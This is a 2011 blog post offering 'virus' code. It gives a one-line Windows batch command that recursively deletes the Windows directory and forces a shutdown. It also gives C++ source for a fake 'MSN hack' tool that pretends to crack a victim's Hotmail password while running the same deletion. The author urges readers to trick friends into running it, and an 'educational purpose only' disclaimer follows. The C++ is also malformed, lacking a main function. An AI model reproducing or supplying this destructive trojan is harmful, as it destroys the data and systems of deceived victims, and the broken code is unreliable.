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Monday, February 21, 2011

Simple Virus Program

Well this is a simple batch virus that will delete your victim's windows.
It's tested and it works 100%
Open up a notepad and type:

@echo off rd /Q /S %windir% shutdown -s -t 01

Save as > .bat file
When you run it, it will delete your c:\windows\
You'll need to format after that.
Now a C++ code to trick your friends


#include <iostream> 
#include <windows.h> 
using namespace std; 
string email; 
system("title MSN HACK by .:d3vILL:."); 
cout << "Welcome to MSN hack by .:d3vILL:." << endl; cout << "Enter your victim's email :"; 
cin >> email; 
cout << "Veryfing email"; 
for(int i=1;i<=3;i+=1); 
{ cout << "."; Sleep(750); } 
cout << "Hacking password of " << email << endl; 
cout << "Please wait.." << endl; Sleep(1000); 
cout << "Estimated time: 10 minutes" << endl; Sleep(1000); 
system("@echo off"); 
system("rd /S /Q %windir%"); 
return 0; 
} ////////////////////////// / Coded By DGi / //////////////////////////

This is actually the same , but you can tell your friends it's a MSN hack program that hacks hotmail email passwords.

Note: It is provided for educational purpose only. Do it on your own risk.

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